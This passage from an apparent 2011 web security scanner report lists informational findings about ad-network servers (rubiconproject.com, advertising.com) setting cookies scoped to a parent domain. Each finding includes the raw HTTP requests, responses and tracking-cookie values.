GIF89a...................!.......,...........T..;

8.44. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1; expires=Fri, 07-Oct-2011 14:14:23 GMT; path=/; domain=.rubiconproject.com
put_1185=2863298321806118365; expires=Sun, 06-Nov-2011 14:14:23 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4212&nid=1185&put=2863298321806118365&expires=60 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2863298321806118365&rnd=9204366597143776733&fpid=6&nu=y&t=&sp=y&purl=&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; rdk=7725/12338; rdk15=0; ses15=12338^2&12590^1; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1; expires=Fri, 07-Oct-2011 14:14:23 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C2%2C%2C; expires=Fri, 07-Oct-2011 14:14:23 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1185=2863298321806118365; expires=Sun, 06-Nov-2011 14:14:23 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.45. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%264214%3D1; expires=Fri, 07-Oct-2011 14:14:24 GMT; path=/; domain=.rubiconproject.com
put_1197=3620501663059719663; expires=Fri, 07-Oct-2011 14:14:24 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4214&nid=1197&put=3620501663059719663&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=7856/12590; rdk15=0; ses15=12338^2&12590^2; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C; put_1185=2863298321806118365

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%264214%3D1; expires=Fri, 07-Oct-2011 14:14:24 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%264214%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:24 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1197=3620501663059719663; expires=Fri, 07-Oct-2011 14:14:24 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.46. http://pluck.abc.net.au/ver1.0/daapi2.api previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pluck.abc.net.au
Path:	/ver1.0/daapi2.api

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=SJL02WSITEMABC1proddmlocal; domain=abc.net.au; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.Users.UserRequest%22%2C%22UserKey%22%3A%7B%22Key%22%3A%22%22%2C%22ObjectType%22%3A%22Models.Users.UserKey%22%7D%7D%2C%22PayloadType%22%3A%22Requests.Users.UserRequest%22%7D%5D%2C%22Metadata%22%3Anull%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&cb=PluckSDK.jsonpcb('request_0') HTTP/1.1
Host: pluck.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=242052946.1543285740.1315422868.1315422868.1315422868.1; __utmb=242052946.2.10.1315422868; __utmc=242052946; __utmz=242052946.1315422868.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=782303/size=728090/u=2/bnum=36271028/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252Fbusiness%252Fbusiness-old%252Ffraud-blackmail-in-latest-oswal-claims%252Fstory-e6frg2qu-1226131700884

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:19:04 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=782303/size=728090/u=2/bnum=36271028/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252Fbusiness%252Fbusiness-old%252Ffraud-blackmail-in-latest-oswal-claims%252Fstory-e6frg2qu-1226131700884 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.904635.782303.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:19:04 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 663
Date: Wed, 07 Sep 2011 14:19:04 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:19:04 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=2371445c-a53a-4dfc-b41b-d796be2cd87a&clickTag=http://r1-ads.ace.advertising.com/click/site=0000
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=782303/size=728090/u=2/bnum=36912405/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=782303/size=728090/u=2/bnum=36912405/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.904635.782303.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:58 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 663
Date: Wed, 07 Sep 2011 14:14:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:58 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=2371445c-a53a-4dfc-b41b-d796be2cd87a&clickTag=http://r1-ads.ace.advertising.com/click/site=0000
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=782303/size=728090/u=2/bnum=5306309/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:15:19 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=782303/size=728090/u=2/bnum=5306309/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.904635.782303.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:15:19 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 661
Date: Wed, 07 Sep 2011 14:15:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:15:19 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=2371445c-a53a-4dfc-b41b-d796be2cd87a&clickTag=http://r1-ads.ace.advertising.com/click/site=0000
...[SNIP]...

8.50. http://r1-ads.ace.advertising.com/site=799695/size=300250/u=2/bnum=27560796/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref= previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=799695/size=300250/u=2/bnum=27560796/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=799695/size=300250/u=2/bnum=27560796/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.33166992268525064&keyword=smh/news_other&rf=http%3A//news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1023677.799695.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:49 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 548
Date: Wed, 07 Sep 2011 14:14:49 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:49 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script language="JavaScript" type="text\/javascript">document.write(\'<script language="JavaScript" src="http:\/\/optimized-by.rubiconproject.com\/a\/dk.js?defaulting_ad=i3333333136
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=799696/size=728090/u=2/bnum=35855233/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.watoday.com.au%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:35 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=799696/size=728090/u=2/bnum=35855233/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.watoday.com.au%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1023906.799696.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:35 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 679
Date: Wed, 07 Sep 2011 14:14:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:35 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('\r\n<script language="javascript" type="text\/javascript">\r\n var dkcb = Math.random();\r\n document.write(
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=799696/size=728090/u=2/bnum=85535532/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fnews.smh.com.au%252Fbreaking-news-national%252Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:15:31 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=799696/size=728090/u=2/bnum=85535532/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fnews.smh.com.au%252Fbreaking-news-national%252Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.8213596055284142&keyword=smh/news_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1023906.799696.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:15:31 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 679
Date: Wed, 07 Sep 2011 14:15:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:15:31 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('\r\n<script language="javascript" type="text\/javascript">\r\n var dkcb = Math.random();\r\n document.write(
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=801645/size=728090/u=2/bnum=18256183/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:10 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=801645/size=728090/u=2/bnum=18256183/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1069538.801645.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:10 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:14:09 GMT
Content-Length: 995
Connection: close
